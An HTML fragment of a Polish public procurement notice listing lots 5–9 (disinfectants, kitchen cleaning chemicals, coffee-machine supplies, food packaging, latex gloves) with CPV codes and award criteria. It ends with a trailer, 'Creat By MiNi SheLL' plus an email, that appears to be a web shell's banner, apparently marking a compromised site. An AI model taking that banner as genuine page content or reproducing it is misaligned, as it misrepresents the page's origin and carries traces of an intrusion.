5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Środki do mycia i dezynfekcji powierzchni</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Środek do mycia i dezynfekcji powierzchni typu Micro-Quat Extra lub równoważny o parametrach nie gorszych niż: Przeznaczenie: do mycia i dezynfekcji powierzchni technologicznych w zakładach zbiorowego żywienia (podłogi, ściany, ciągi wydawcze stalowe i inne wyposażenie ze stali nierdzewnej w pomieszczeniach produkcyjnych, magazynowych, ciągach komunikacyjnych, salach konsumenckich, wszystkie powierzchnie mające bezpośredni kontakt z żywnością) oraz wszystkich urządzeń gastronomicznych i sprzętu itp. Właściwości: silne właściwości bakteriobójcze, emulgujące tłuszcze, usuwające przykre zapachy, nie powodujące korozji stali, aluminium, szkła i tworzyw sztucznych. Działanie dezynfekcyjne potwierdzone wynikami badań mikrobiologicznych (dołączyć dokument wyników badań). Zdolność do biologicznej neutralizacji, ponad 90%. - Baketriobójcze zgodnie z normą EN 1276 i EN 13697 w stężeniu 1% (tj. 100ml /10l ) w czasie do 5 minut - Drożdżakobójcze zgodnie z normą EN 1650 w stężeniu 0,5% (tj. 50ml /10l) w czasie do 15 minut - Drożdżakobójcze zgodnie z normą EN 13697 w stężeniu 0,5% (tj. 50ml /10l) w czasie do 5 minut Postać: płynny koncentrat do rozcieńczania. Stosowanie: poprzez systemy dozujące PENGUIN 4U oraz MS3 Opakowanie: kanister 5 l. Skład chemiczny: w 100 g produktu zawiera: 80 g/kg czwartorzędowe związki amonowe, benzylo-C12-16-alkilodimetylowe, chlorki, 9,8 g/kg chlorek didecylodimetyloamonu. Opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ (formularz cenowy) oraz załącznik nr 1 do umowy (OPZ).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39831250-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Środki do higienizacji obiektów bloku żywnościowego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Środek do mycia urządzeń chłodniczych 5LŚrodek do mycia i dezynfekcji urządzeń chłodniczych typu Freezer Cleaner lub równoważny o parametrach nie gorszych niż: Przeznaczenie: Środek w formie koncentratu, stosowany bez konieczności rozmrażania chłodni do czyszczenia, nadaje się również do maszynowego czyszczenia powierzchni, doskonały efekt czyszczenia w temp. do -30 °C. Spełniający wymogi HACCP Właściwości: usuwa przykre zapachy. Postać: płyn, klarowna ciecz bezbarwna do słomkowej. Stosowanie: środek do użytku poprzez spryskiwanie powierzchni z butelki z atomizerem. Środek do mycia pieców konwekcyjnych 5Ltypu Oven Cleaner Power lub równoważny o parametrach nie gorszych niż: Przeznaczenie: środek alkaliczny czyszczący zabrudzenia tłuszczowe w piecach konwekcyjno-parowych z systemem automatycznego mycia Właściwości: myjące, odłuszczające Z systemem automatycznego – mycia Postać: płyn Stosowanie: środek stosowany do użytku przemysłowego, zastosowanie profesjonalne do czyszczenia procesowego Skład chemiczny: pH 12,00-14,00 (koncentrat środka), rozpuszczalny w wodzie, wodorotlenek potasu 5-10%, tlenek alkiloaminy 0,25-0,6%. Opakowanie: kanister 5L. Środek do usuwania przypaleńŚrodek do czyszczenia przypalonych powierzchni typu Greasecutter lub równoważny o parametrach nie gorszych niż: Przeznaczenie: czyszczenie i odtłuszczanie grilli, piekarników, kratek wentylacyjnych, frytkownic, rusztów i pozostałych elementów wyposażenia kuchni wymagających efektywnego odtłuszczania. Właściwości: Dzięki formule piankowej preparat przylega do pionowych powierzchni szybko usuwając nawet najbardziej uporczywe i zwęglone zabrudzenia. Unikalna formuła w połączeniu ze specjalnie zaprojektowaną końcówką dozującą pozwala uniknąć emisji aerozolu. Nie generuje niebezpiecznych oparów i niweluje ryzyko utworzenia mgły przez produkt. Opakowanie: butelka ze spryskiwaczem 0,75 – 1,0L.Mleczko do czyszczenia 0,75LMleczko czyszczące typu Rilan Creme lub równoważny o parametrach nie gorszych niż:Właściwości: mleczko czyszczące zawierające specjalne składniki powierzchniowo czynne. Cząsteczki ścierające zapewniają usuwają pozostałości tłuszczu i silne zabrudzenia. Łatwość spłukiwania zapewnia lśniąco czystą powierzchnię.Opakowanie: butelka 0,75L.Nabłyszczacz do zmywarekProdukt do maszynowego mycia naczyń typu Apex Rinse lub równoważny o parametrach nie gorszych niż: Właściwości: Super skoncentrowany środek nabłyszczający w formie bloku przeznaczony do zmywarek przemysłowych. Produkt oznaczony kolorem /zielony/ i kształtem eliminuje ryzyko pomyłki z innym produktem. Zapewnia błyszczącą i nieskazitelnie czystą zastawę stołową. Zapewnia niezmienne rezultaty błyszczącej i lśniącej zastawy stołowej w przypadku wody o średniej twardości i dużej zawartości soli rozpuszczonych w wodzie. Nie wymaga stosowania środków ochrony indywidualnej. Stosowanie: przystosowany do dozowania przez zamknięty system dozujący.Opakowanie: blok 1 - 2 kg. Odkamieniacz do urządzeń gastronomicznychProdukt do usuwania osadów mineralnych (kamienia) typu StriA-Way lub równoważny o parametrach nie gorszych niż: Przeznaczenie: płyn do okresowego usuwania osadów mineralnych (kamienia wapiennego i tlenków żelaza) z urządzeń gastronomicznych, maszyn do mycia naczyń, pieców konwekcyjno - parowych, bemarów grzewczych, czajników, kotłów warzelnych, gromadzących się w czasie eksploatacji urządzeń itp. Postać: płyn - koncentrat. Stosowanie: bezpośrednio z opakowania, skuteczna dawka: 50-100ml/litr wody. Opakowanie: kanister 5LSkład chemiczny: niejonowe środki powierzchniowo czynne, kwasy nieorganiczne (kwas solny, kwas fosforowy lub kwas azotowy w roztworze wodnym), wartość pH do 2. Środek do maszynowego mycia naczyńŚrodek do maszynowego mycia naczyń z dodatkiem wybielacza typu Apex Ultra lub równoważny o parametrach nie gorszych niż: Właściwości: Super skoncentrowany środek w formie bloku przeznaczony do zmywarek przemysłowych. Służy do mycia naczyń w wodzie o średniej twardości. Produkt oznaczony kolorem / biały/ i kształtem eliminuje ryzyko pomyłki z innym produktem. Optymalizuje koszty użytkowania - zapewnia wykorzystanie 100% produktu. W składzie zawiera m.in.: węglanu sodu >= 50 - <= 100%, fosfoniany >= 5 - < 10%; ph 1% roztworu 10,5% - 11,4% Stosowanie: przystosowany do dozowania przez zamknięty systemem dozujący. Opakowanie: blok do 3,1 kg Środek do czyszczenia posadzekŚrodek do czyszczenia posadzek kuchennych typu Ecolab Kitchenpro washʹn walk lub równoważny o parametrach nie gorszych niż: Właściwości: Produkt wysoko skoncentrowany, skutecznie usuwa wszystkie typy tłuszczów, specjalne enzymy działają w trakcie, jak i po zastosowaniu produktu, nie wymaga spłukiwania, duża wydajność, działa przy użyciu zimnej wody, minimalizuje ryzyko poślizgnięcia, bezpieczny dla użytkownika. Opakowanie: worek do 2 L Stosowanie: do zastosowania poprzez zamknięty system dozowania. Sól tabletkowa Sól tabletkowa do uzdatniaczy przy urządzeniach typu: maszyna do mycia naczyń; piec konwekcyjno-parowy. Środek uzdatniający wodę i chroniący przed osadzaniem kamienia, zawierający antyzbrylacz. Skład chemiczny: chlorek sodu min 99% (bez zanieczyszczeń stałych)Opakowanie: worek 25 kgPreparat do mycia naczyń 1LPreparat do ręcznego mycia naczyń typu Assert Lemon lub równoważny o parametrach nie gorszych niż: Przeznaczenie: ręczne mycie naczyń, sprzętu kuchennego oraz powierzchni porcelanowych, szklanych, aluminiowych, lakierowanych i ze stali szlachetnej. Przeznaczony do stosowania w profesjonalnych kuchniach, stołówkach, restauracjach. Właściwości: emulgujące tłuszcze, bakteriobójcze, nisko pieniący, łatwo zmywalny. Zdolność do biologicznej neutralizacji, ponad 90%. ph 8-9. Postać: koncentrat w płynie, bezzapachowy Opakowanie: 1 LKoncentrat do ręcznego mycia naczyń 5LKoncentrat do ręcznego mycia naczyń typu Assert Lemon lub równoważny o parametrach nie gorszych niż: Przeznaczenie: ręczne mycie naczyń, sprzętu kuchennego oraz powierzchni porcelanowych, szklanych, aluminiowych, lakierowanych i ze stali szlachetnej. Przeznaczony do stosowania w profesjonalnych kuchniach, stołówkach, restauracjach. Właściwości: emulgujące tłuszcze, bakteriobójcze, nisko pieniący, łatwo zmywalny. Zdolność do biologicznej neutralizacji, ponad 90%. ph 8-9. Postać: koncentrat w płynie, bezzapachowy Opakowanie: kanister 5 LŚrodek do mycia stali nierdzewnejŚrodek do mycia i konserwacji stali nierdzewnej typu Helios Brillant lub równoważny o parametrach nie gorszych niż: Właściwości: nadawanie świeżego wyglądu stali chromowo – niklowej, nabłyszczanie, odświeżanie. Szybko i delikatnie usuwa nawet uporczywy brud i tłuszcz, a także osady wapienne, zacieki, rdzę, zanieczyszczenia stałe czy produkty utleniania. Opakowanie: 0,5 – 0,75 L butelka wyposażona w spryskiwacz. Produkt do niwelowania zapachówProdukt do niwelowania zapachów i odtłuszczania odpływów typu Ne-O-dor lub równoważny o parametrach nie gorszych niż: Przeznaczenie: środek do usuwania przykrych zapachów z rur kanalizacyjnych, pisuarów Właściwości: odświeża powietrze Postać: płyn. Stosowanie: środek stosowany do użytku przemysłowego Opakowanie: kanister polietylen 2,5-5 L Skład chemiczny: pH 7,2-8,2 (koncentrat środka) , rozpuszczalny w wodzie, środki zapachowe, perfumy, środki konserwujące Nabłyszczacz do zmywarek typu domowego 1LNabłyszczacz do zmywarek typu domowego. Nadający idealny połysk umytym naczyniom bez konieczności dodatkowego wycierania. Usuwa i zapobiega powstawaniu osadów wapiennych.. Opakowanie: 1 LTabletki do zmywarek typu domowegoTabletki do zmywarek typu domowego. Działanie zarówno w niskich jak i w wysokich temperaturach. Skuteczne usuwanie tłuszczu. Funkcja soli i nabłyszczacza.Opakowanie: 100szt.Sól do zmywarekSól do zmywarek w postaci granulek. Zmiękcza wodę, chroni zmywarkę, zapobiega zaciekom na naczyniach. Przeciwdziałanie powstawaniu kamienia.Opakowanie: 1 kg<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39830000-9, 39800000-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>7</td><td><b>Nazwa: </b></td><td>Materiały eksploatacyjne do ekspresów.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Filtr wody do ekspresu JURAOpakowanie: 3 szt.Filtr BRITA do ekspresów Filtr chroniący urządzenie przed nagromadzeniem kamienia. BRITA INTENZA do ekspresów m.in. SAECO, PhilipsOpakowanie: 1 szt.Tabletki czyszczące do ekspresu JURA.Opakowanie: 6 szt.Odkamieniacz do ekspresu JURAOpakowanie: 9 szt.Płyn do czyszczenia spieniacza mlekaPłyn do czyszczenia systemu spieniania mleka do ekspresu JURA.Opakowanie: 1 litr.Płyn do odkamieniania ekspresu ciśnieniowegoPłyn do odkamieniania ekspresów. Skutecznie usuwający osad wapienny powstający w wyniku podgrzewania wody. Do ekspresów SAECO, deLonghi Opakowanie: 250 ml. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39830000-9, 39800000-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>8</td><td><b>Nazwa: </b></td><td>Środki do higienizacji obiektów bliku żywnościowego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Gąbka do naczyń duża A`5 - Zmywak-gąbka do naczyń składająca się z dwóch powierzchni. Gruba i wytrzymała warstwa szorująca. Do usuwania zabrudzeń z powierzchni. Wymiary: min. 140x70x50mm. Opakowanie: 5 sztuk.Zmywak kuchenny do teflonu - Zmywak o delikatnej strukturze, do usuwania zabrudzeń z powierzchni pokrytych teflonem. Delikatnie czyści i nie niszczy powierzchni. Opakowanie: 1 sztuka.Ściereczka z mikrofibry do naczyń - Ściereczka wykonana z mieszanki bardzo cienkich włókien. Doskonale wyciera i poleruje naczynia kuchenne. Nie pozostawia na czyszczonej powierzchni smug ani zacieków. Bardzo trwała. Wielokrotnego użytku.Wymiary: 40x40cm. Opakowanie: 1 sztuka.Torebki HDPE a`1000 szt. - Torebki służące do pakowania i przechowywania artykułów spożywczych. Można w nich zamrażać i przechowywać żywność. Wymiar: 14x4x32cm – 250 opak. Wymiar: 14x4x26cm – 250 opak. Opakowanie jednostkowe: 1000 szt. Woreczki do poboru prób - Woreczki do poboru prób o pojemności 450-500ml. Sterylne, z zamknięciem strunowym i z polem opisowym. Wytrzymałe, przejrzyste wykonane z folii polietylenowej. Opakowanie jednostkowe: 100szt.Reklamówka HDPE 25x45cm a`200 szt. - Tzw. reklamówki – zrywki (marketówki) Przeznaczone do m.in. do pakowania towarów spożywczych. Mocne i łatwe w użyciu. Wykonane z folii polietylenowej HDPE. Wymiary: 25x45cm.Opakowanie jednostkowe: 200 szt.Torebki śniadaniowe papierowe - Torebki śniadaniowe papierowe. Przeznaczone do pakowania np. kanapek. Chroniące żywność przed wysuszeniem. Torebki odporne na przenikanie tłuszczu i wody. Opakowanie: 50szt.Serwetki gastronomiczne białe A`500 - Serwetki gastronomiczne cięte, gładkie. Wykonane z jednowarstwowej bibułki zapewniającej delikatność i chłonność. Wymiary: 15x15cm. Kolor: biały. Opakowanie jednostkowe: 500szt.Serwetki ozdobne A`20 - Serwetki stołowe, ozdobne,3-warstwoweWymiary: 33x33cm. Kolory: czerwony, zielony, żółty, ecru, (po 100 opakowań każdy kolor) Opakowanie jednostkowe: 20 szt.Serwetki do dozownika A`6000 - Serwetki do dozownika (dyspensera). Białe, jednowarstwowe. Pasujące do serwetnika (dozownika) P420. Wymiary: złożone: 13cm(dł) x 9cm(szer.), rozłożone: 27cm(dł) x 21cm(szer.), Opakowanie: 6000szt.Ręcznik kuchenny MAXI - Ręcznik papierowy wykonany z celulozy. Przeznaczony do użytku w kuchni. Z zawartością jonów srebra co zapobiega rozwojowi bakterii i jest dopuszczony do kontaktu z żywnością. Chłonny i wytrzymały. Ilość warstw: 2.Długość rolki: 80-100metrów. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39224320-7, 39832000-3, 39514200-0, 39222100-5, 18937000-6, 39222000-4, 33764000-3, 33763000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>9</td><td><b>Nazwa: </b></td><td>Rękawiczki lateksowe.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Rękawiczki lateksowe, bezpudrowe. Kształt uniwersalny pasujący na prawą i lewą dłoń. Zastosowanie w przemyśle spożywczym. Kolor: biały. Rozmiar: LOpakowanie: 100 szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>18424300-0, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com